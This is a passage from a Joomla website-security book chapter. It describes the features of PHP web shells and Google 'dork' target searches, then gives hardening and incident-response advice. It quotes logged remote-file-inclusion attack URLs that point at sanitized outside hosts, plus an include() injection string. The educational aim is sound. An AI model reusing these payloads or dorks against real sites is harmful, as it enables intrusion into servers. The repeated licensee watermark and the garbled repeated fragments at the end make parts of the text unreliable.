Chapter 6 [ 137 ] Zooming in on the tool bar, we see that the shell has several options listed under it: Selecting the FTP Quick brute will work to break the passwords on the site. Once this shell is inserted, possibly through a Trojan horse, the "owner" of the shell can break passwords and log in normally, thus avoiding any nastiness with log les showing weird trafc. Though he or she could easily wipe out the log les with this tool: Next, you can learn all about the server, what hardware is running, and what the OS build, version, and patch levels are. One note: You will see that Open Base Dir is OFF (not secure). This is one way an attacker could enter the site. Remember our PHP settings? Here is an example where the shell is reporting the server security information. This information was obtained with one of the scanning scripts that report information about your environment: This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 How the Bad Guys Do It [ 138 ] What shell would be complete without its own ability to connect to your SQL server? The next screenshot is the Execution PHP-code box. The attacker can run PHP. The attacker can run PHP commands through this, perhaps as a launching off point to attack another site. The IP would resolve back to your server, not theirs. The real power of the command shell is shown in the following screenshot. It has a built-in list of commands ready to execute. Note the passwords, commands, writeable les and folders, conguration les, and more: This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Chapter 6 [ 139 ] This shell has a very handy browsing tool, giving the perpetrator the ability to add, or delete, or change les. It can browse all the way to the top root of the server. You can see that the Perms column gives you the ability to change any le or directory permission: My favorite part of this shell, (Warning: This is humor), is the following screenshot. These guys take their craft so seriously that they ask for feedback on the shell or hack and bugs. This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 How the Bad Guys Do It [ 140 ] But developers of legitimate commercial or open-source applications should also take their craft seriously to avoid instances of hacking. I have examined the source code of this and I can tell you this is a well-written and a very useful (albeit for bad) tool. The shell in the next screenshot is copyrighted by its developer, and is released under a different license than the earlier one. The images are copyrighted by the developers. I have not provided of the names of either the developers for obvious reasons. Here is another command shell found through Google search. It has been sanitized to hide the ownership and source. It is as powerful as the last example, with a few "added" features that make this one even more powerful. The available screenshot is divided into the following four parts to have a clear and distinctive view: This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Chapter 6 [ 141 ] The next part that follows is this. This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 How the Bad Guys Do It [ 142 ] Then the following details are displayed. Details about Databases and Net are shown in the following section of the original screenshot. When enlarged, this screenshot is a powerful control tool for servers and websites. This tool is almost useable for commercial purposes, more so than many of the popular administration tools available today. This one has similar capabilities, giving the attacker a control over les, permissions, passwords, and so on. It also has a built in email engine: This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Chapter 6 [ 143 ] The reason I have spent time showing you the shells is to make you aware of the danger lax security represents. Finding Targets to Attack A "Dork" is a Google search to locate targets. Those targets can be simply a specic version of an extension or a device such as a webcam on a specic port. Let us say a bad guy nds out that the extension is vulnerable from one of the many exploits or responsible disclosure sites. He or she could Google all the targets like this: inurl:"/com_example/" In this example, the com_example would be the extension you are searching for. Once this search is run, it will yield a lovely list of targets. This sort of thing happens every time a new exploit is reported. Everyone rushes out to try and break into your site. You want to watch your logs such as this: http://www.yourdomain.com/index.php?option=com_noticias&Itemid=xcorpitx&t ask=detalhe&id=http://www.XXXXXX.net/3333/read/test.txt?? /?mosCong_absolute_path=http://xxxxx.yyyyyyyyyyy.pt/test.txt? /poll/comments.php?id=%7B$%7Binclude($aaa)%7D%7D%7B$%7Bexit()%7D%7 D&ddd=http These are three examples of recent attacks against a client's domain that I pulled out for this chapter. The top one is a common attack. The test.txt is meant to test your server and pull out variables to help them determine weaknesses. If your site is strengthened and properly congured using .htaccess and the other tools mentioned, it should dramatically lower the potential effect of this particular threat on your sites. This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 How the Bad Guys Do It [ 144 ] What Do I Do Then? First assess your own security as much as you can. Hire a professional to check your security after you're through. If you want to use the tools we discussed earlier in this chapter to protect and monitor yourself, a good place to start is your local library or book store, and the Internet. Educate yourself in these key areas: Networking DNS Very rudimentary TCP or IP Apache common log le format Basic PHP commands .htaccess includes php.ini includes The tools listed: NMAP Wireshark Basic Linux commandsLinux commands Hacker (read: the bad guys) sitese bad guys) sites Sites such as CERT.ORG You will need to learn to have patience because as you start nding issues, you will want your host to x them. They typically do not like interference and may get upset. Again, do not try anything in this chapter without the express permission of the owner of the computer, host, network, or website. In my opinion, NMAP should be one of the rst tools you learn about. It provides you the highest degree of information about what is important to you. Countermeasures After you have conducted your own security scanning and patched your site, you will want to go about hardening your site. Here are some vital things: Close all unnecessary ports, or open ONLY the ones you need. Uninstall any extension not in use (mambot, plug-in, component, module). Uninstall FrontPage Services from shared hosting. If you are using Joomla!, you will not need FrontPage. • • • • • • • • ° ° • • • • • • This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Chapter 6 [ 145 ] Ensure that your host is at the latest patch levels for OS and the associated moving parts such as Apache, OpenSSL, MySQL (version dependent), and PHP. Set your permissions as tightly as possible. Fine-tune your site through .htaccess and php.ini. If you allow uploads, limit the size and sequester them for testing. Check your log les frequently. Block specic countries that are known to be havens for attacks, IF you do not need trafc from those countries. See the nal chapter in this book for a good way to nd this information. Have an excellent disaster recovery and business continuity plan for your site. Back up tapes or CDs of your applications and data. License keys or serial numbers. Get the secondary host set up and ready. Consider Virtual Private Servers, as they help by protecting you from other shared hosts. Block nuisance IP addresses. Keep apprised of the latest techniques that are being used to break into sites. If you note ANY suspicious behavior from your website, contact your host and report a potential security incident. But What If My Host Won't Cooperate? Get a new host. It is that simple. Hosts are a dime a dozen and quite a few of them operate as if they don't care, and I have seen my share. They might have grown too fast, they might be resellers of larger hosting operations, they might not share your 'technical opinion'. So what? Get another host and be done with it. What If My Website Is Broken into and Defaced? First, assess the damage. IMMEDIATELY make copies of all the logs you can nd and remove the copy from the server. This could be useful for law enforcement reasons. Ensure that you have a backup. Now would be a good time for a full restoration. • • • • • • • • • • • • • • • • • This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 How the Bad Guys Do It [ 146 ] Contact your host and inform them of the "incident". If the tech is uncooperative, or tells you that it's your fault, ask for his or her supervisor and keep trying till you nd someone who can help you out. If you don't have a backup, then: Check every le's permission. Check every index.php and index.htm or index.html for stuff that does not belong. Check for odd or increased trafc. Ask your host to run netstat and other tools to see if there are any processes running that should not be. Consider rebuilding the site from scratch, including removal of the old hosting account. Yes, it is that important. What If a Rootkit Has Been Placed on My Server? This is a vitally important issue. You will want to do a few things rst: IMMEDIATELY obtain a full backup and understand that it may be full of viruses. This will help with the forensics and legal issues. Attempt to locate the rootkit. It may be known by several names: C99.php German.php Arab.php R57.php Tst.txt Or any .php le that looks like it doesn't belong Various .html or .htm les that don't belong Shut down your site from receiving or distributing trafc, by putting up a simple HTML webpage with a message for your visitors. Scan ALL of your PCs for Trojans and viruses. You are likely to be working against time at this point and your best bet may be to simply delete the account, move to a new host, and start over. Why is the last option the best option even after being drastic? Because if a rootkit has made it onto a shared server, it will take a full restoration or a newly-installed operating system on that physical server to wipe it out. • • ° ° ° ° ° • • ° ° ° ° ° ° ° • • • This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 . by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Chapter 6 [ 141 ] The next part that follows is this. This material is copyright and is licensed for the sole use by. 2008 1010 SW High Ave., , Topeka, , 66604 Chapter 6 [ 145 ] Ensure that your host is at the latest patch levels for OS and the associated moving parts such as Apache, OpenSSL, MySQL (version dependent),. make this one even more powerful. The available screenshot is divided into the following four parts to have a clear and distinctive view: This material is copyright and is licensed for the sole